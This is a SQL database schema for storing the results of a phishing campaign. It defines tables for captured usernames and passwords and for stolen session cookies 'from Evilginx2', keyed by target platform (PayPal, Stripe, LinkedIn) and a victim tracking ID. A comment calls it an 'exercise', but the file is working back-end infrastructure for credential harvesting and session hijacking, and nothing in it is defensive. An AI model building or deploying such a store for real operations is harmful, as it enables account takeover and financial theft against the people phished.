-- Setup for harvesting results
CREATE TABLE IF NOT EXISTS captured_credentials (
    id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    created_at TIMESTAMP WITH TIME ZONE DEFAULT NOW(),
    platform TEXT NOT NULL, -- e.g., 'paypal', 'stripe', 'linkedin'
    target_id TEXT, -- The tracking ID generated by the portal
    user_id TEXT, -- The portal user ID if available
    username TEXT,
    password TEXT,
    metadata JSONB -- Any additional data captured
);

CREATE TABLE IF NOT EXISTS captured_sessions (
    id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    created_at TIMESTAMP WITH TIME ZONE DEFAULT NOW(),
    platform TEXT NOT NULL,
    target_id TEXT,
    cookies JSONB NOT NULL, -- The full session cookie blob from Evilginx2
    user_agent TEXT,
    ip_address TEXT,
    is_active BOOLEAN DEFAULT TRUE
);

-- Enable Row Level Security (RLS) but for this exercise we'll keep it simple
-- or you can configure specific policies as needed.
ALTER TABLE captured_credentials ENABLE ROW LEVEL SECURITY;
ALTER TABLE captured_sessions ENABLE ROW LEVEL SECURITY;

-- Allow service role to do everything
CREATE POLICY "Allow service role all" ON captured_credentials FOR ALL TO service_role USING (true);
CREATE POLICY "Allow service role all sessions" ON captured_sessions FOR ALL TO service_role USING (true);
